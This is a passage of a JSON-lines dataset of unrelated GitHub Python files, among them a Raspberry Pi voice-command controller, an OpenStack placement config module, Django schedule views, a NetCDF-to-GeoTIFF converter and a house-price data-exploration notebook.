text=\"Birthday\", anchor=CENTER)\nmy_tree.heading(\"Address\", text=\"Address\", anchor=CENTER)\nmy_tree.heading(\"Phone\", text=\"Phone Number\", anchor=CENTER)\nmy_tree.heading(\"Department\", text=\"Department\", anchor=CENTER)\nmy_tree.heading(\"Course\", text=\"Course\", anchor=CENTER)\nmy_tree.heading(\"Year\", text=\"Year\", anchor=CENTER)\n\n\n\n\n\nroot.bind('', register)\nroot.bind('', delete)\nrefreshTable()\nroot.mainloop()","repo_name":"donForProjects/Student-Login-System","sub_path":"reg.py","file_name":"reg.py","file_ext":"py","file_size_in_byte":11879,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"3536756631","text":"# Import necessary modules and libraries\nimport RPi.GPIO as GPIO\nimport speech_recognition as sr \nimport spi_communication as spi\nimport time\n\n# Define the GPIO pin for the push button\nBUTTON_GPIO = 16 \n\n# Initialize the Speech Recognition module\nr = sr.Recognizer()\nmic = sr.Microphone()\n\n# Function to recognize speech using the microphone\ndef recognize_speech():\n with mic as source:\n try:\n # Listen for audio input and recognize it using Google's speech recognition\n audio = r.listen(source, timeout = 5.0)\n words = r.recognize_google(audio)\n print(words)\n return words\n except:\n print(\"No Answer\")\n return None\n\nif __name__== '__main__':\n # Set the GPIO mode and configure the push button pin\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(BUTTON_GPIO, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n# Main loop \nwhile True:\n if not GPIO.input(BUTTON_GPIO):\n print(\"Start Talking\")\n words = recognize_speech() # Start listening for speech \n else:\n words = None\n \n # If speech is recognized, send the corresponding SPI command\n if words != None:\n if words == \"open system\":\n spi.send_spi_command(0x5)\n elif words == \"shut down system\":\n spi.send_spi_command(0x6)\n elif words == \"AC open\":\n spi.send_spi_command(0x4)\n elif words == \"AC stop\":\n spi.send_spi_command(0x1)\n elif words == \"motor open\":\n spi.send_spi_command(0x2)\n elif words == \"motor stop\":\n spi.send_spi_command(0x3)\n else:\n print(\"Wrong input try again\")\n \n # End of the code","repo_name":"MostafaIibrahim/V2C_Project_Based_ADAS_ITI_GP","sub_path":"voice recognition version2/SPI_RAS/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"73180307671","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom keystoneauth1 import loading as ks_loading\nfrom oslo_config import cfg\n\nfrom nova.conf import utils as confutils\n\n\nDEFAULT_SERVICE_TYPE = 'placement'\n\nplacement_group = cfg.OptGroup(\n 'placement',\n title='Placement Service Options',\n help=\"Configuration options for connecting to the placement API service\")\n\nplacement_opts = [\n cfg.StrOpt(\n 'os_region_name',\n deprecated_for_removal=True,\n deprecated_since='17.0.0',\n deprecated_reason='Endpoint lookup uses the service catalog via '\n 'common keystoneauth1 Adapter configuration '\n 'options. Use the region_name option instead.',\n help=\"\"\"\nRegion name of this node. This is used when picking the URL in the service\ncatalog.\n\nPossible values:\n\n* Any string representing region name\n\"\"\"),\n cfg.StrOpt(\n 'os_interface',\n deprecated_for_removal=True,\n deprecated_since='17.0.0',\n deprecated_reason='Endpoint lookup uses the service catalog via '\n 'common keystoneauth1 Adapter configuration '\n 'options. Use the valid_interfaces option instead.',\n help=\"\"\"\nEndpoint interface for this node. This is used when picking the URL in the\nservice catalog.\n\"\"\"),\n cfg.BoolOpt('randomize_allocation_candidates',\n default=False,\n help=\"\"\"\nIf True, when limiting allocation candidate results, the results will be\na random sampling of the full result set. If False, allocation candidates\nare returned in a deterministic but undefined order. That is, all things\nbeing equal, two requests for allocation candidates will return the same\nresults in the same order; but no guarantees are made as to how that order\nis determined.\n\"\"\"),\n]\n\ndeprecated_opts = {\n 'region_name': [cfg.DeprecatedOpt('os_region_name',\n group=placement_group.name)],\n 'valid_interfaces': [cfg.DeprecatedOpt('os_interface',\n group=placement_group.name)]\n}\n\n\ndef register_opts(conf):\n conf.register_group(placement_group)\n conf.register_opts(placement_opts, group=placement_group)\n confutils.register_ksa_opts(conf, placement_group, DEFAULT_SERVICE_TYPE,\n deprecated_opts=deprecated_opts)\n\n\ndef list_opts():\n return {\n placement_group.name: (\n placement_opts +\n ks_loading.get_session_conf_options() +\n ks_loading.get_auth_common_conf_options() +\n ks_loading.get_auth_plugin_conf_options('password') +\n ks_loading.get_auth_plugin_conf_options('v2password') +\n ks_loading.get_auth_plugin_conf_options('v3password') +\n confutils.get_ksa_adapter_opts(DEFAULT_SERVICE_TYPE,\n deprecated_opts=deprecated_opts))\n }\n","repo_name":"bopopescu/Cloud-User-Management","sub_path":"kolla-docker/nova/nova/conf/placement.py","file_name":"placement.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24329703424","text":"a=5;\nb=6;\n\nprint(int.__add__(a,b));\n\nclass Student:\n def __init__(self,n1,n2):\n self.n1=n1;\n self.n2=n2;\n def __add__(self, other):\n n1=self.n1+other.n1;\n n2=self.n2+other.n2;\n s3=Student(n1,n2);\n return s3;\n\n def __gt__(self, other):\n m1=self.n1+self.n2;\n m2=other.n1+other.n2;\n if m1>m2:\n return True\n else:\n return False\n def __str__(self):\n return '{} {}'.format(s1.n1,s1.n2);\n\ns1=Student(100,20);\ns2=Student(59,1);\n\ns3=s1+s2;\nprint(s3.n1);\n\nif s1>s2:\n print(\"S1 wins\");\nelse:\n print(\"S2 wins\");\n\ns=9;\nprint(s.__str__());\n\nprint(s1);","repo_name":"MdAbuZehadAntu/Python_Basics","sub_path":"OperatorOverloadingPolymorphism.py","file_name":"OperatorOverloadingPolymorphism.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"25778440683","text":"from rest_framework.filters import (\n FilterSet\n)\nfrom csacompendium.research.models import NitrogenApplied\n\n\nclass NitrogenAppliedListFilter(FilterSet):\n \"\"\"\n Filter query list from nitrogen applied database table\n \"\"\"\n class Meta:\n model = NitrogenApplied\n fields = {\n 'nitrogen_amount': ['exact', 'gte', 'lte'],\n 'amount_uom': ['iexact', 'icontains'],\n 'nitrogen_source': ['iexact', 'icontains'],\n }\n order_by = ['nitrogen_amount']\n","repo_name":"nkoech/csacompendium","sub_path":"csacompendium/research/api/nitrogenapplied/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34731963205","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nadmin.autodiscover()\n\nurlpatterns = patterns(\n '',\n\n # css3two_blog\n url(r'^(?P\\d*)/$', 'css3two_blog.views.home'),\n url(r'^$', 'css3two_blog.views.home'),\n url(r'^blog/', include('css3two_blog.urls')),\n url('^sitemap/$', 'css3two_blog.views.sitemap'),\n\n # admin \n url(r'^admin/', include(admin.site.urls)),\n url(r'^referral/', 'my_blog.views.referral')\n) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nhandler404 = 'my_blog.views.handler404'\n","repo_name":"wangyuxiong/My_Blog","sub_path":"my_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"36749000427","text":"\n# class\n\nclass Person:\n \n #class attributes\n address='no information'\n #constructor(yapıcı method)\n def __init__(self, name, year):\n #object attributes\n self.name=name\n self.year=year\n print('init methodu çalıştı.')\n #methods\n\n\n# object (instance)\np1=Person(name='ali', year=1990)\np2=Person(name='yagmur', year=1995)\n\np1.name='ahmet'\np1.address='kocaeli'\n\nprint(p1)\nprint(p2)\n#accessing object attributes\nprint(f'name : {p1.name}, year: {p1.year}, address : {p1.address}')\nprint(f'name : {p2.name}, year: {p2.year}, address : {p2.address}')\n\n# print(p1, p2)\n# print(type(p1))\n# print(type(p2))","repo_name":"AydinTokuslu/pyhthonBasics","sub_path":"Genel/CLASS.PY","file_name":"CLASS.PY","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29860249370","text":"import requests\nimport validators # Check if a string is a valid URL or not\nfrom requests.exceptions import Timeout #the time it will wait on a response once your client has established a connection\n\nURL=input(\"Hello, Enter your link:\")\nvalid=validators.url(URL)\n\nwhile valid!=True:\n print(\"You entered invalid Link(URL)!! \")\n url=input(\"Enter the Link(URl) again: \")\n valid = validators.url(url)\n URL=url\nelse:\n\n print(\"The Link(Url) is valid\")\n g=requests.get(URL)\n print(g.text)\n\n\ntry:\n response = requests.get(URL, timeout=1)\nexcept Timeout:\n print('The request timed out')\nelse:\n print('The request did not time out')\n\n","repo_name":"MaramAlsofiani/Reading-the-content-of-a-URL","sub_path":"ReadURL.py","file_name":"ReadURL.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73209484952","text":"T = int(input())\nfor tc in range(1, T+1):\n K, N, M = map(int, input().split())\n lst = list(map(int, input().split()))\n\n bus_stop = [i for i in range(N+1)]\n my_pos = 0\n cnt = 0\n\n flag = True\n while flag:\n for i in range(K, 0, -1):\n if my_pos + i < N:\n if bus_stop[my_pos + i] in lst:\n cnt += 1\n my_pos = my_pos + i\n break\n else:\n flag = False\n break\n else:\n flag = False\n cnt = 0\n\n print(f'#{tc} {cnt}')","repo_name":"KangDaeSu/TIL","sub_path":"231101/swea_4831.py","file_name":"swea_4831.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37130727567","text":"from config import *\n\n\ndef extract_nc_data_to_array(nc_path):\n \"\"\"\n Extracts the dataset from nc file\n\n :param nc_path: string, with the path to the nc file\n :return: nc.Dataset, with the nc bands; int, with the width in longitude degree; int, with the heigh in latitude degree\n \"\"\"\n ds = nc.Dataset(nc_path)\n ds_lon = ds.variables['longitude'].shape[0]\n ds_lat = ds.variables['latitude'].shape[0]\n\n return ds, ds_lon, ds_lat\n\n\ndef apply_cfac_to_array(ds, ds_lon, ds_lat, c_fac_arr):\n \"\"\"\n Applys a c factor value for summer and winter based on a nc dataset that contains 32 PFT bands. Each band contains\n percent share of the land cover for each pixel. Based on the share the percentual C-factor is applied.\n\n :param ds: nc.Dataset, that contains land use classes (32 PFT bands)\n :param ds_lon: int, with the width in longitude degrees\n :param ds_lat: int, with the height in latitude degrees\n :param c_fac_arr: np.array, with 32 rows and 3 columns. The rows have to align to the 32 PFT bands. The columns have to have [Name/index, C-factor summer value, C-factor winter value, ...]\n :return: np.array, with c-factors (summer) accroding to lat and lon; np.array, with c-factors (winter) accroding to lat and lon\n \"\"\"\n merged_raster_summer = np.zeros([ds_lat, ds_lon], dtype=float, order='C')\n merged_raster_winter = np.zeros([ds_lat, ds_lon], dtype=float, order='C')\n\n for pft_nr in range(len(ds.variables) - 2):\n # Apply each C-Factors share to every pixel\n r_fac_summer = ds.variables[\"PFT\" + str(pft_nr)][:] / 100 * c_fac_arr.loc[pft_nr][1]\n r_fac_winter = ds.variables[\"PFT\" + str(pft_nr)][:] / 100 * c_fac_arr.loc[pft_nr][2]\n\n # Data is fipped by 90° therefore rotate it\n merged_raster_summer += np.transpose(r_fac_summer)\n merged_raster_winter += np.transpose(r_fac_winter)\n\n return merged_raster_summer, merged_raster_winter\n\n\ndef export_to_tif(ds_lon, ds_lat, merged_raster, export_file):\n \"\"\"\n Converts a raster array to a GEOTIFF file and exports it to the given location. The export is safed as proj=latlong\n in the cordinate system epsg:4326\n\n :param ds_lon: int, with the width in longitude degrees\n :param ds_lat: int, with the height in latitude degrees\n :param merged_raster: np.array, with the C-factors for each pixel\n :param export_file: str, with the new path to the GEOTIFF\n \"\"\"\n # create the transform for the base matrix in lat/long projection\n transform = rio.transform.Affine.translation(-180, 90) * rio.transform.Affine.scale(0.05000000120000000492,\n -0.05000000119999999798)\n\n dst_crs = '+proj=latlong'\n #dst_crs = \"EPSG:32634\"\n #dst_crs = \"EPSG:4326\"\n profile = {\n 'driver': 'GTiff',\n 'height': ds_lat,\n 'width': ds_lon,\n 'count': 1,\n 'dtype': str(merged_raster.dtype),\n 'transform': transform\n }\n\n with rio.open(export_file, 'w', crs=dst_crs, **profile) as dst:\n dst.write(merged_raster, 1)\n\n\ndef transform_to_target_crs(src_file, dst_file, dst_crs):\n \"\"\"\n Transformes a GEOTIFF file to the target crs system.\n\n :param src_file: str, with the path to the original GEOTIFF\n :param dst_file: str, with the path to the new GEOTIFF\n :param dst_crs: str, with the new crs system\n \"\"\"\n with rio.open(src_file) as src:\n # transform for input raster\n src_transform = src.transform\n\n # calculate the transform matrix for the output\n dst_transform, width, height = wrp.calculate_default_transform(\n src.crs, # source CRS\n dst_crs, # destination CRS\n src.width, # column count\n src.height, # row count\n *src.bounds, # unpacks outer boundaries (left, bottom, right, top)\n )\n\n if USELOG:\n print(\"Source Transform:\\n\", src_transform, '\\n')\n print(\"Destination Transform:\\n\", dst_transform)\n\n # set properties for output\n dst_kwargs = src.meta.copy()\n dst_kwargs.update(\n {\n \"crs\": dst_crs,\n \"transform\": dst_transform,\n \"width\": width,\n \"height\": height,\n \"nodata\": -9999, # replace 0 with np.nan\n }\n )\n\n with rio.open(dst_file, \"w\", **dst_kwargs) as dst:\n for i in range(1, src.count + 1):\n wrp.reproject(\n source=rio.band(src, i),\n destination=rio.band(dst, i),\n src_transform=src.transform,\n src_crs=src.crs,\n dst_transform=dst_transform,\n dst_crs=dst_crs,\n resampling=Resampling.nearest,\n )\n\n\ndef get_file_str(file_path):\n \"\"\"\n Returns the file name of an entire file path.\n\n :param file_path: str, with the file path\n :return: str, with the file name\n \"\"\"\n alias = os.path.splitext(os.path.split(file_path)[1])[0]\n return alias\n","repo_name":"KMouris/LU_nc_to_C","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33578539529","text":"from django.shortcuts import get_object_or_404, render\n\n# Create your views here.\nfrom .models import Jadwal, CustomUser\nfrom .forms import JadwalForm\nfrom django.http import HttpResponseRedirect\nfrom django.http.response import HttpResponse, JsonResponse\nfrom django.core import serializers\nfrom django.contrib.auth.decorators import login_required\nfrom django.template.loader import render_to_string\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import JadwalSerializer\nfrom rest_framework import status\n\n\ndef is_guru(user):\n return user.groups.filter(name='Guru').exists()\n\n@api_view(['GET'])\ndef get_jadwals(request,username):\n try:\n user = CustomUser.objects.get(username=username)\n if is_guru(user):\n jadwals = Jadwal.objects.all().filter(guru=user)\n serializer = JadwalSerializer(jadwals, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n except:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET'])\ndef get_jadwal(request, pk):\n jadwal = Jadwal.objects.get(id=pk)\n serializer = JadwalSerializer(jadwal, many=False)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef create_jadwal(request):\n try:\n data = request.data\n jadwal = Jadwal.objects.create(\n title = data[\"title\"],\n kelas = data[\"kelas\"],\n day = data[\"day\"],\n start = data[\"start\"],\n end = data[\"end\"],\n link = data[\"link\"],\n desc = data[\"desc\"],\n guru = CustomUser.objects.get(username=data[\"guru\"])\n )\n serializer = JadwalSerializer(jadwal, many=False)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\ndef update_jadwal(request, pk):\n try:\n data = request.data\n jadwal = Jadwal(\n id = pk,\n title = data[\"title\"],\n kelas = data[\"kelas\"],\n day = data[\"day\"],\n start = data[\"start\"],\n end = data[\"end\"],\n link = data[\"link\"],\n desc = data[\"desc\"],\n guru = CustomUser.objects.get(username=data[\"guru\"])\n )\n jadwal.save()\n serializer = JadwalSerializer(jadwal, many=False)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n# def jadwal_json(request):\n# obj = Jadwal.objects.all()\n# data = serializers.serialize('json', list(obj), fields=('title','kelas', 'link', 'day'))\n# return HttpResponse(data, content_type=\"application/json\")\n \n# def add_jadwal(request):\n# if not is_guru(request.user):\n# return JsonResponse({\"status\": \"error\"}, status=401)\n\n# if request.method == 'POST':\n# data = json.loads(request.body)\n# form = JadwalForm()\n \n# form.day = data[\"day\"]\n# form.start = data[\"start\"]\n# form.end = data[\"end\"]\n# form.link = data[\"link\"]\n# form.kelas = data[\"kelas\"]\n# form.title = data[\"title\"]\n# form.desc = data[\"desc\"]\n# form.guru = request.user\n\n# form.save()\n\n# return JsonResponse({\"status\": \"success\"}, status=200)\n# else:\n# return JsonResponse({\"status\": \"error\"}, status=401)\n\n# def update_jadwal(request):\n# if not is_guru(request.user):\n# return JsonResponse({\"status\": \"error\"}, status=401)\n\n# if request.method == 'POST':\n# data = json.loads(request.body)\n# jadwal = Jadwal.objects.all().filter(guru=request.user)\n# obj = jadwal.filter(id=data['id']).first()\n\n# if not obj:\n# return JsonResponse({\"status\": \"error\"}, status=401)\n\n# form = JadwalForm(instance=obj)\n \n# form.day = data[\"day\"]\n# form.start = data[\"start\"]\n# form.end = data[\"end\"]\n# form.link = data[\"link\"]\n# form.kelas = data[\"kelas\"]\n# form.title = data[\"title\"]\n# form.desc = data[\"desc\"]\n# form.guru = request.user\n\n# form.save()\n\n# return JsonResponse({\"status\": \"success\"}, status=200)\n# else:\n# return JsonResponse({\"status\": \"error\"}, status=401)\n\n@login_required(login_url='/pendaftaranguru/')\ndef jadwal(request, pk = None):\n if not is_guru(request.user):\n return render(request, 'jadwal.html', {'is_guru':False})\n \n edit = False\n jadwal = Jadwal.objects.all().filter(guru=request.user)\n \n # Update Jadwal\n if pk != None:\n edit = True\n obj = jadwal.filter(id=pk).first()\n\n if not obj:\n return HttpResponseRedirect('/jadwal')\n\n form = JadwalForm(instance=obj)\n if request.method == 'POST' and request.user.is_authenticated:\n form = JadwalForm(request.POST, instance=obj)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/jadwal')\n else:\n pass\n\n # Create Jadwal\n else:\n if request.method == 'POST' and request.user.is_authenticated:\n form = JadwalForm(request.POST)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.guru = request.user\n form.save()\n return HttpResponseRedirect('/jadwal')\n else:\n obj = None\n else:\n form = JadwalForm()\n obj = None\n\n return render(request, 'jadwal.html', {'is_guru':True, 'form':form, 'jadwal': jadwal, 'obj':obj, 'edit':edit})\n\ndef filter_jadwal(request):\n kelas=request.GET.getlist('kelas[]')\n jadwal=Jadwal.objects.all().filter(guru=request.user)\n if len(kelas)>0:\n jadwal=jadwal.filter(kelas__in=kelas).distinct()\n \n t=render_to_string('jadwal_card.html',{'jadwal':jadwal})\n return JsonResponse({'data':t})\n\n","repo_name":"bryanmahdavikhia/Bimbol","sub_path":"jadwal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6622191449","text":"import json\nfrom data_tokenizer import TokenizerWrap\n\ndata_src = json.loads(open(\"data/src.json\", \"r\").read())\n['' if type(i) is None else i for i in data_src]\ndata_dest = json.loads(open(\"data/dest.json\", \"r\").read())\n['' if type(i) is None else i for i in data_dest]\nnum_words = 10000\ntokenizer_src =TokenizerWrap(texts=data_src,padding='pre',reverse=True,num_words=num_words,coded_text=False) \ntokenizer_dest = TokenizerWrap(texts=data_dest,padding='post',reverse=False,num_words=num_words,coded_text=True)\n\ndef jsonify(ipclass):\n\tfor key , value in ipclass.iteritems():\n\t\tprint(key)\n\t\tif key =='tokens_padded':\n\t\t\tipclass[key] = value.tolist()\t\t\n\treturn ipclass\t\n\nprint(\"dest\")\nd_dict = jsonify(tokenizer_dest.__dict__)\nprint(\"src\")\ns_dict =jsonify(tokenizer_src.__dict__)\n\njson.dump(d_dict,open('data/dest_tok.json', \"w\"))\njson.dump(s_dict,open('data/src_tok.json', \"w\"))","repo_name":"omkarjc27/nmt-code-generator","sub_path":"pretokenize.py","file_name":"pretokenize.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70771173519","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\nimport pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport seaborn as sns\nsns.set(style=\"whitegrid\", color_codes=True)\nsns.set(font_scale=1)\n\nfrom sklearn.linear_model import LinearRegression\n\n\n\n\nhouses=pd.read_csv(\"../input/train.csv\")\nhouses.head()\n\n\n\n\nhouses_test = pd.read_csv(\"../input/test.csv\")\n#transpose\nhouses_test.head()\n#note their is no \"SalePrice\" column here which is our target varible.\n\n\n\n\n#shape command will give number of rows/samples/examples and number of columns/features/predictors in dataset\n#(rows,columns)\nhouses.shape\n\n\n\n\nhouses_test.shape\n#1 column less because target variable isn't there in test set!\n\n\n\n\n#info method provides information about dataset like \n#total values in each column, null/not null, datatype, memory occupied etc\nhouses.info()\n\n\n\n\n#How many columns with different datatypes are there?\nhouses.get_dtype_counts()\n\n\n\n\n##Describe gives statistical information about numerical columns in the dataset\nhouses.describe()\n\n\n\n\ncorr=houses.corr()[\"SalePrice\"]\ncorr[np.argsort(corr, axis=0)[::-1]]\n\n\n\n\ncorr=houses[['OverallQual' ,'GrLivArea' ,'GarageCars','GarageArea' ,\n 'TotalBsmtSF','1stFlrSF','FullBath','TotRmsAbvGrd',\n 'YearBuilt','YearRemodAdd','SalePrice']].corr()#[\"SalePrice\"]\n#plt.figure(figsize=(10, 10))\n\nsns.heatmap(corr, vmax=1, square=True,annot=True)\nplt.title('Correlation between features')\n\n\n\n\ncorrelations=houses.corr()\nattrs = correlations.iloc[:-1,:-1] # all except target\n\nthreshold = 0.5\nimportant_corrs = (attrs[abs(attrs) > threshold][attrs != 1.0]) .unstack().dropna().to_dict()\n\nunique_important_corrs = pd.DataFrame(\n list(set([(tuple(sorted(key)), important_corrs[key]) \\\n for key in important_corrs])), \n columns=['Attribute Pair', 'Correlation'])\n\n # sorted by absolute value\nunique_important_corrs = unique_important_corrs.ix[\n abs(unique_important_corrs['Correlation']).argsort()[::-1]]\n\nunique_important_corrs\n\n\n\n\nhouses[['OverallQual','SalePrice']].groupby(['OverallQual'],\nas_index=False).mean().sort_values(by='OverallQual', ascending=False)\n\n\n\n\nhouses[['GarageCars','SalePrice']].groupby(['GarageCars'],\nas_index=False).mean().sort_values(by='GarageCars', ascending=False)\n\n\n\n\nhouses[['Fireplaces','SalePrice']].groupby(['Fireplaces'],\nas_index=False).mean().sort_values(by='Fireplaces', ascending=False)\n\n\n\n\n#lets see if there are any columns with missing values \nnull_columns=houses.columns[houses.isnull().any()]\nhouses[null_columns].isnull().sum()\n\n\n\n\nhouses['LotFrontage'].corr(houses['LotArea'])\n\n\n\n\nhouses['SqrtLotArea']=np.sqrt(houses['LotArea'])\nhouses['LotFrontage'].corr(houses['SqrtLotArea'])\n\n\n\n\nsns.jointplot(houses['LotFrontage'],houses['SqrtLotArea'],color='gold')\n\n\n\n\nfilter = houses['LotFrontage'].isnull()\nhouses.LotFrontage[filter]=houses.SqrtLotArea[filter]\n\n\n\n\nplt.scatter(houses[\"MasVnrArea\"],houses[\"SalePrice\"])\nplt.show()\n\n\n\n\nhouses[\"MasVnrType\"].value_counts().plot(kind='bar',colors='gold')\n\n\n\n\nhouses[\"MasVnrType\"] = houses[\"MasVnrType\"].fillna('None')\nhouses[\"MasVnrArea\"] = houses[\"MasVnrArea\"].fillna(0.0)\n\n\n\n\nlabels = houses[\"Electrical\"].unique()\nsizes = houses[\"Electrical\"].value_counts().values\nexplode=[0.1,0,0,0,0]\nparcent = 100.*sizes/sizes.sum()\nlabels = ['{0} - {1:1.1f} %'.format(i,j) for i,j in zip(labels, parcent)]\n\ncolors = [ 'lightcoral','gold','yellowgreen', 'lightblue','purple']\npatches, texts= plt.pie(sizes, colors=colors,explode=explode,\n startangle=90)\nplt.legend(patches, labels, loc=\"best\")\n\nplt.title(\"Electrical\")\nplt.show()\n\n\n\n\n#We can replace missing values with most frequent ones.\nhouses[\"Electrical\"] = houses[\"Electrical\"].fillna('SBrkr')\n\n\n\n\nsns.stripplot(x=houses[\"Alley\"], y=houses[\"SalePrice\"],jitter=True)\n\n\n\n\nhouses[\"Alley\"] = houses[\"Alley\"].fillna('None')\n\n\n\n\nsns.distplot(houses[\"TotalBsmtSF\"])\n\n\n\n\nbasement_cols=['BsmtQual','BsmtCond','BsmtExposure','BsmtFinType1','BsmtFinType2','BsmtFinSF1','BsmtFinSF2']\nhouses[basement_cols][houses['BsmtQual'].isnull()==True]\n\n\n\n\nfor col in basement_cols:\n if 'FinSF'not in col:\n houses[col] = houses[col].fillna('None')\n\n\n\n\nsns.factorplot(\"Fireplaces\",\"SalePrice\",data=houses,hue=\"FireplaceQu\")\n\n\n\n\n#If fireplace quality is missing that means that house doesn't have a fireplace\nhouses[\"FireplaceQu\"] = houses[\"FireplaceQu\"].fillna('None')\npd.crosstab(houses.Fireplaces, houses.FireplaceQu)\n\n\n\n\nsns.boxplot(houses[\"GarageArea\"],color='r')\n\n\n\n\nsns.barplot(houses[\"GarageCars\"],houses[\"SalePrice\"])\n\n\n\n\ngarage_cols=['GarageType','GarageQual','GarageCond','GarageYrBlt','GarageFinish','GarageCars','GarageArea']\nhouses[garage_cols][houses['GarageType'].isnull()==True]\n\n\n\n\nfor col in garage_cols:\n if houses[col].dtype==np.object:\n houses[col] = houses[col].fillna('None')\n else:\n houses[col] = houses[col].fillna(0)\n\n\n\n\n#If PoolArea is 0, that means that house doesn't have a pool.\n#So we can replace PoolQuality with None.\nhouses[\"PoolQC\"] = houses[\"PoolQC\"].fillna('None')\n\n\n\n\nlabels = houses[\"Fence\"].unique()\nsizes = houses[\"Fence\"].value_counts().values\nexplode=[0.1,0,0,0]\nparcent = 100.*sizes/sizes.sum()\n#labels = ['{0} - {1:1.1f} %'.format(i,j) for i,j in zip(labels, parcent)]\n\ncolors = ['yellowgreen', 'gold', 'lightblue', 'lightcoral']\npatches, texts,autotexts= plt.pie(sizes, colors=colors,autopct=\"%1.1f%%\",\n shadow=True,startangle=90)\nplt.legend(patches, labels, loc=\"best\")\n\nplt.title(\"Fence\")\nplt.show()\n\n\n\n\nhouses[\"Fence\"] = houses[\"Fence\"].fillna('None')\n\n\n\n\nhouses[\"MiscFeature\"].value_counts().plot(kind='pie')\n\n\n\n\n#Some houses don't have miscellaneous features like shed, Tennis court etc..\nhouses[\"MiscFeature\"] = houses[\"MiscFeature\"].fillna('None')\n\n\n\n\n#Let's confirm that we have removed all missing values\nhouses[null_columns].isnull().sum()\n\n\n\n\nlabels = houses[\"MSZoning\"].unique()\nsizes = houses[\"MSZoning\"].value_counts().values\nexplode=[0.1,0,0,0,0]\nparcent = 100.*sizes/sizes.sum()\nlabels = ['{0} - {1:1.1f} %'.format(i,j) for i,j in zip(labels, parcent)]\n\ncolors = ['yellowgreen', 'gold', 'lightblue', 'lightcoral','blue']\npatches, texts= plt.pie(sizes, colors=colors,explode=explode,\n shadow=True,startangle=90)\nplt.legend(patches, labels, loc=\"best\")\n\nplt.title(\"Zoning Classification\")\nplt.show()\n\n\n\n\nplt.hist(houses[\"GrLivArea\"],color='purple')\nplt.xlabel(\"Ground Living Area\")\nplt.show()\n\n\n\n\nsns.distplot(houses[\"YearBuilt\"],color='seagreen')\n\n\n\n\nsns.distplot(houses[\"YearRemodAdd\"],color='r')\n\n\n\n\nhouses[\"Heating\"].value_counts().plot(kind='bar')\n\n\n\n\nsns.factorplot('HeatingQC', 'SalePrice', hue = 'CentralAir', data=houses)\n\n\n\n\nsns.countplot(houses[\"FullBath\"])\n\n\n\n\nsns.countplot(houses[\"TotRmsAbvGrd\"])\n\n\n\n\nsns.factorplot(\"KitchenAbvGr\",\"SalePrice\",data=houses,hue=\"KitchenQual\")\n\n\n\n\nsns.countplot(x = 'Neighborhood', data = houses)\nplt.xticks(rotation=45) \nplt.show()\n\n\n\n\nplt.barh(houses[\"OverallQual\"],width=houses[\"SalePrice\"],color=\"r\")\n\n\n\n\nplt.scatter(houses[\"1stFlrSF\"],houses[\"SalePrice\"])\nplt.show()\n\n\n\n\n#street\nsns.stripplot(x=houses[\"Street\"], y=houses[\"SalePrice\"])\n\n\n\n\n\n\n","repo_name":"aorursy/Filtered-NB-Python-3","sub_path":"hassansin_house-prices-data-exploration-and-visualisation.py","file_name":"hassansin_house-prices-data-exploration-and-visualisation.py","file_ext":"py","file_size_in_byte":7175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"23441131307","text":"import pygame, sys, random\nfrom pygame.locals 